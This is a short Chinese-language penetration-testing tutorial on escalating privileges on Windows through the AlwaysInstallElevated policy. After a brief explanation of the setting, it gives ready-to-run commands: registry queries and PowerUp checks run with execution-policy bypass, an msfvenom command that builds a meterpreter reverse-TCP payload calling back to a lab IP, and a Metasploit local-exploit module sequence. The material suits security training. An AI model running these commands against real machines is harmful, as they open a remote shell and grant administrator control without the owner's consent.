参考资料：
https://hacknpentest.com/windows-privilege-escalation-via-alwaysinstallelevated-technique/
视频地址
作者注：跟linux中的suid权限有点像，某种应用程序，普通用户可以运行，并且程序有着管理员权限。

发现漏洞

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

AlwaysInstallElevated是一项功能，可为Windows计算机上的所有用户（特别是低特权用户）提供运行任何具有提升特权的MSI文件的功能。 MSI是基于Microsoft的安装程序软件包文件格式，用于安装，存储和删除程序。

注意：此选项等效于授予完整的管理权限，这可能会带来巨大的安全风险。 Microsoft强烈建议不要使用此设置。

默认情况下，此选项是关闭的，要创建此特权升级入口点，我们需要将其打开，我们将在此博客中进一步介绍。

由于该功能允许所有用户以提升的权限运行msi文件，因此低特权用户确实可以运行恶意的msi文件，并且可以生成shell或将新创建的用户添加到Administrator组。

使用powershell脚本发现漏洞

powershell -nop -ep bypass
Import-Module C:\Users\user\Desktop\PowerUp.ps1

Get-RegistryAlwaysInstallElevated

生成载荷

handler -H 192.168.1.101 -P 44555 -p windows/x64/meterpreter/reverse_tcp

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=44555 -f exe -o payload.exe

利用漏洞

use exploit/windows/local/always_install_elevated
show options
set session 1
set payload windows/x64/meterpreter/reverse_tcp
set lport 3344
set lhost 192.168.1.101
run